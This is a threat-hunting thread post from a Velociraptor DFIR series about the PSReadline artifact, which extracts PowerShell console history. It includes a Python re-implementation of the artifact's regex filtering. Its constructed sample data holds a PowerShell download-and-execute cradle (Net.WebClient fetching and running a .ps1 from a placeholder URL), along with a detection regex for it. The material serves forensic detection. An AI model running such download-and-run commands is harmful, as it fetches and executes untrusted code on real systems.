🦖Day 78 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Windows.System.PSReadline
Author: @mgreen27
Link: https://docs.velociraptor.app/artifact_references/pages/windows.system.powershell.psreadline/
----
Adversaries may abuse PowerShell commands and scripts for execution.
In fact, PowerShell is commonly used by attackers across all stages of the attack lifecycle.
They can use PowerShell to perform a number of actions, including discovery of information and execution of code.
----
This artifact will search and extract lines from PSReadline history file.
The PSReadline module is responsible for command history and, from PowerShell 5 on Windows 10, its default configuration saves a copy of the console history to disk.
----
The following parameters are available for use with this artifact:
'SearchStrings' - regex search over a PSReadline line
'StringWhiteList' - regex whitelist for results
'UserRegex' - regex search on username
'UploadFiles' - upload in-scope ConsoleHost_history.txt files
----
In the attached image, we can see multiple attempts to download and execute a .ps1 file using 'Net.WebClient' through PowerShell.
Our view into the source of 'Default_File_Path.ps1' and what it does is somewhat hindered, but we can see that the bit.ly URL contains the text 'L3g1tCrad1e'.
----
If we were to look at what originally happened during the PowerShell session, we would see that in each instance, the Default_File_Path.ps1 file was downloaded and executed 👀
----
These commands were not necessarily malicious; they are used here for illustrative purposes. If you would like to test these commands for yourself, check out the Atomic Red Team test using the link below!
----
Overall, this artifact includes the following information about the PowerShell console history file:
- Last modified time and other timestamps
- Line number
- Line (commands that were run)
- User
- Path to the PowerShell console history file
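----
As an added example (not the artifact's VQL and not Velociraptor code), here is a Python re-implementation of the filtering the artifact performs, showing how SearchStrings, StringWhiteList and UserRegex narrow the rows returned and producing the same columns listed above. The history paths, users and console lines are constructed sample data.

```python
import re
from dataclasses import dataclass

# Default per-user PSReadline history location on Windows 10 / PowerShell 5.
def history_path(user: str) -> str:
    return rf"C:\Users\{user}\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"

@dataclass
class HistoryHit:          # one row, mirroring the artifact's output columns
    mtime: str
    line_number: int
    line: str
    user: str
    path: str

def user_from_path(path: str) -> str:
    """Derive the username from C:\\Users\\<user>\\... (same idea as the artifact)."""
    m = re.search(r"\\Users\\([^\\]+)\\", path, re.IGNORECASE)
    return m.group(1) if m else ""

def hunt_psreadline(histories, search_strings=".", string_whitelist=None, user_regex="."):
    """histories: iterable of (path, mtime, text). Returns matching lines as rows."""
    search = re.compile(search_strings, re.IGNORECASE)
    allow = re.compile(string_whitelist, re.IGNORECASE) if string_whitelist else None
    user_re = re.compile(user_regex, re.IGNORECASE)
    hits = []
    for path, mtime, text in histories:
        user = user_from_path(path)
        if not user_re.search(user):
            continue                      # UserRegex: skip out-of-scope users
        for number, line in enumerate(text.splitlines(), start=1):
            if not search.search(line):
                continue                  # SearchStrings: keep only matching lines
            if allow and allow.search(line):
                continue                  # StringWhiteList: drop known-good noise
            hits.append(HistoryHit(mtime, number, line, user, path))
    return hits

# Constructed sample histories (not real hosts): a download-and-run of a .ps1
# like the one in the thread, plus an admin's legitimate internal script fetch.
SAMPLE_HISTORIES = [
    (history_path("alice"), "2021-10-31T10:00:00Z",
     "Get-Process\n"
     "(New-Object Net.WebClient).DownloadFile('https://bit.ly/EXAMPLE-PLACEHOLDER', 'Default_File_Path.ps1')\n"
     ".\\Default_File_Path.ps1\n"
     "Get-ChildItem C:\\Temp\n"),
    (history_path("svc_backup"), "2021-10-30T22:15:00Z",
     "Get-Service\n"
     "Invoke-WebRequest -Uri https://intranet.example/backup.ps1 -OutFile backup.ps1\n"),
]
```

Running `hunt_psreadline(SAMPLE_HISTORIES, search_strings=r"Net\.WebClient|\.ps1", string_whitelist=r"intranet\.example")` returns only alice's two download-cradle lines; dropping the whitelist also returns the svc_backup line.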
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
Also, check out the MITRE ATT&CK page for 'Command and Scripting Interpreter: PowerShell' below!
https://attack.mitre.org/techniques/T1059/001/
#velociraptor #artifactsofautumn #dfir #forensics #infosec #windows #t1059 #threathunting